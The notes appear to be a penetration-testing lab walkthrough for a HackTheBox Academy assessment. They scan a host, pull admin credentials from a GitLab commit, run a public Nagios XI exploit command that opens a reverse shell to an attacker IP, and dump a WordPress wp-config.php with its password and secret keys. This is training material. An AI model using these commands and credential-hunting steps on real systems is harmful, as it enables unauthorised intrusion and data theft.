Assessment 2
nmap 10.129.235.11
Starting Nmap 7.93 ( https://nmap.org ) at 2025-09-13 11:36 EDT
Nmap scan report for gitlab.inlanefreight.local (10.129.235.11)
Host is up (0.097s latency).
Not shown: 994 closed tcp ports (conn-refused)
PORT STATE SERVICE
22/tcp open ssh
25/tcp open smtp
80/tcp open http
389/tcp open ldap
443/tcp open https
8180/tcp open unknown
80 / 443 have an inlanefreight website
8180 - gitlab instance
- created a user
- searching for projects, we find
monitoring.inalenfreight.local - in the project, we see a commit with admin creds to the
monitoringwebsite - adding to
/etc/hosts - logging in with the admin creds
- using version - 5.7.5
- trying - https://www.exploit-db.com/exploits/49422
python3 nagiosxi-5.7.x.py https://monitoring.inlanefreight.local nagiosadmin P@ssw0rd 10.10.14.6 8884
we get shell as www-data
- the folder where we spawn has a
<hash>_flag.txt
More enum:
- user
nagioshas acookie.txt- didnt seem important /var/wwwhas a few websitesapp.ilf.local- nothingmrtg- nothinghtml- seems like our 80/443 websiteblog.ilf.local- wordpress website
- added
blog.ilf.localto/etc/hosts -
reading through
/wp-config.php/ ** MySQL settings - You can get this info from your web host ** // /** The name of the database for WordPress */ define( 'DB_NAME', 'wordpress' ); /** MySQL database username */ define( 'DB_USER', 'wordpressadm' ); /** MySQL database password */ define( 'DB_PASSWORD', 'HTB_@cademy_WP!' ); /** MySQL hostname */ define( 'DB_HOST', 'localhost' ); /** Database charset to use in creating database tables. */ define( 'DB_CHARSET', 'utf8' ); /** The database collate type. Don't change this if in doubt. */ define( 'DB_COLLATE', '' ); /**#@+ * Authentication unique keys and salts. * Change these to different unique phrases! You can generate these using * the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}. * * You can change these at any point in time to invalidate all existing cookies. * This will force all users to have to log in again. * * @since 2.6.0 */ define('AUTH_KEY', 'p0YGoceyDDV+%w)uy&;4{Hc@}Ge^++ydjC^w~Sdc<wofL$~QxQ7?OreLT9G~I}Z:'); define('SECURE_AUTH_KEY', 'y&C}JsD%*5Qih^__dWL(WLqZ9q>tzU;(px>KL[X4sn<(.b~tFru:(gWNbSE/jd5y'); define('LOGGED_IN_KEY', '^&g5_3p`Ct 65J1(B}JeI.r[N}g;i!e)OA/^!Z:3FMku)4~-}xSY)~yZ9t|AL8g|'); define('NONCE_KEY', 'F{ Qq(&r|B,+>OG-HzTcwKp-2_/L*zaW(S2z0[Q%4NXX^{$gxI+FJ()}[+8{+C7)'); define('AUTH_SALT', '{42dgC+13-(v_$fd7+nKm>~A(&%6.~TIPux*pj#TE|(]0ooSf9TjHX:`.ijv1,NK'); define('SECURE_AUTH_SALT', '}>z`-z4!,2.?G&f!eW5gd)^hVoYlh+}!>1cu!PSO3[E-{m/|yC$JgX*x?3g hB1]'); define('LOGGED_IN_SALT', '^an]TQGa?9-m}=hLlzsolA]ZGSx]aFLV,;Wn3D?JGrUa7nT24x{07k4Q.%&89]Jk'); define('NONCE_SALT', '[Zn2UfL-*qVR,cms9V^x2.3`U3gQK].jX@MADSt|{^[t N4 ?9]J*XB;h-}9,=9>'); /**#@-*/